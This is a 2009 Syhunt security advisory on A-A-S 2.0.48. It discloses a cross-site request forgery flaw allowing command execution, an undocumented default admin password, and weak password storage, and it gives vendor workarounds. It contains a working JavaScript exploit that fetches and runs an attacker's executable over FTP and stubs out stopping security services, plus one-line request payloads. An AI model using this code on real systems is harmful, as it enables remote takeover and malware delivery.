Syhunt | Syhunt: A-A-S (Application Access Server) Multiple Security Vulnerabilities

Syhunt: A-A-S (Application Access Server) Multiple Security Vulnerabilities

Advisory-ID: 200905111
Discovery Date: 3.23.2009
Release Date: 5.11.2009
Affected Applications: A-A-S 2.0.48 and possibly older versions
Class: XSRF (Cross Site Request Forgery) Arbitrary Command Execution, Undocumented Default Password, Insecure Password Storage
Status: Vendor informed. No fix available
Vendor: Klinzmann
Vendor URL: http://www.klinzmann.name/a-a-s/index_en.html
Advisory URL: http://www.syhunt.com/advisories/?id=aas-multiple

The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVEs to these vulnerabilities:

CVE-2009-1464 - index.aas job parameter XSRF Arbitrary Command

Execution Vulnerability

CVE-2009-1465 - Default Admin Password Vulnerability
CVE-2009-1466 - Insecure Password and Port Keyword Storage

Vulnerability

Overview: The Application Access Server is a popular freeware remote administration tool that allows to start and stop applications or services over the Internet using a Web-based client. It also allows to uninstall applications, remotely shutdown and retrieve various information about the current system the server is running on. It claims to be able to "black list" aggressors and run in "Stealth mode", thus evading port scanners.

The A-A-S server also supports DynDNS.org, which allows aliasing the server IP to a static hostname.

Description: The Application Access Server is vulnerable to extremely dangerous XSRF (Cross Site Request Forgery) attacks. A remote attacker can use the XSRF flaw to take control over the system running the A-A-S server. The issue is triggered when a web page containing a malicious JavaScript code is viewed. Such malicious code can automatically make requests to the AAS server on the user's behalf.

Two additional vulnerabilities affect the Application Access Server: an undocumented default password and insecure password storage. Technical details are included below.

Details: 1) index.aas job parameter XSRF (Cross Site Request Forgery) Arbitrary Command Execution

Example 1 - Arbitrary Command Execution / File Upload See: http://www.syhunt.com/advisories/aashack.txt

 
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

var dd=1000; // default delay time (ms)
var aas_url='http://[host]:6262'; // target AAS host
var ftp_host='x.x.x.x'; // attacker ftp host
var ftp_user='anonymous';
var ftp_pass='123456';
var ftp_commands_file='aashack.ftp';
var batch_file='aashack.bat';
var attacker_file='file.exe'; // file to upload

function delay(ms) {
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < ms);
}

function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write('<img src="'+aas_url+'/index.aas?job='+job+
'&action='+act+'&select='+sel+'" style="visibility:hidden;">');
}

// Main Functions
function Run(action,dms) {
writeimg('command',action,''); delay(dms);
}
function Console(cmdline,dms) {
Run('cmd /C '+cmdline,dms);
}
function AddFTPCmd(cmdline) {
Console('echo '+cmdline+'>>'+ftp_commands_file,dd);
}
function AddBatchLine(line) {
Console('echo '+line+'>>'+batch_file,dd);
}
//function Kill(exename) {
Run('taskkill /f /im '+exename,dd); // alternative way to kill a process
}
function StopSvc(servicename) {
writeimg('setservice','stop',servicename); delay(dd);
}
function KillProcess(exename) {
writeimg('killprocess','',exename); delay(dd);
}

function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus"); 
//StopSvc("wuauserv"); // Automatic Updates
}

function KillUndesiredProcesses() {
//KillProcess('firewall.exe');
}

AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd('binary');
AddFTPCmd('get '+attacker_file);
AddFTPCmd('close');
AddFTPCmd('bye');
AddBatchLine('@echo off');
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);
AddBatchLine('start '+attacker_file);
AddBatchLine('del '+ftp_commands_file);
AddBatchLine('del %0'); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);

This exploit demonstration code automatically makes sequential requests to the AAS server on the user's behalf (if the user is logged in to the server), disabling undesired services, uploading and launching a file on the target machine. It has been successfully tested on IE 7.0 and Firefox 3.08. Should work on any browser that has javascript enabled

Please note that the server's security features like host access list and port modes (Silent or Stealth) will not protect against the XSRF flaw if enabled.

Example 2 - Arbitrary Command Execution:

 
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=command&action=[command]">

This for example would launch the Calculator: /index.aas?job=command&action=calc.exe

Example 3 - Stopping Services:

 
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">

This for example would disable Automatic Updates: /index.aas?job=setservice&action=stop&select=wuauserv

Example 4 - Killing Processes:

 
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=killprocess&select=[exename]">

Example: /index.aas?job=killprocess&select=notepad.exe

Additional commands are available via the job parameter.

2) Default Admin Password Vulnerability By default, A-A-S installs with a default admin account. The account has an undocumented default password of "wildbat" and all the security rights enabled. These default rights allow to execute any commands on the machine.

3) Insecure Password and Port Keyword Storage Vulnerability A-A-S passwords and the port keyword (used to connect to the server when in Stealth or Silent mode) are stored as a base64 string in the "aas.ini" file, contained in the A-A-S install directory, with no encryption at all. This allows the password or port keyword to be easily retrieved.

Vulnerability Status: The vendor was contacted, immediately responded and will be releasing a fix soon.

As a workaround to the XSRF vulnerability, the vendor recommends limiting the security rights in the user settings screen for each user: - Disable the "Allow own command" option (command execution will not be possible after this option is disabled). - If possible also disable the "Enable kill process", "Start/Stop service" and "Run application" rights.

Avoid completely navigating to other websites while logged in to the Application Access Server.

Never start the server using its default settings (as explained above machines running a default A-A-S may be easily compromised). Change the password of the admin account first.

Credit: Felipe Aragon Syhunt Security Research Team, www.syhunt.com

Disclaimer: The information in this advisory is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this advisory.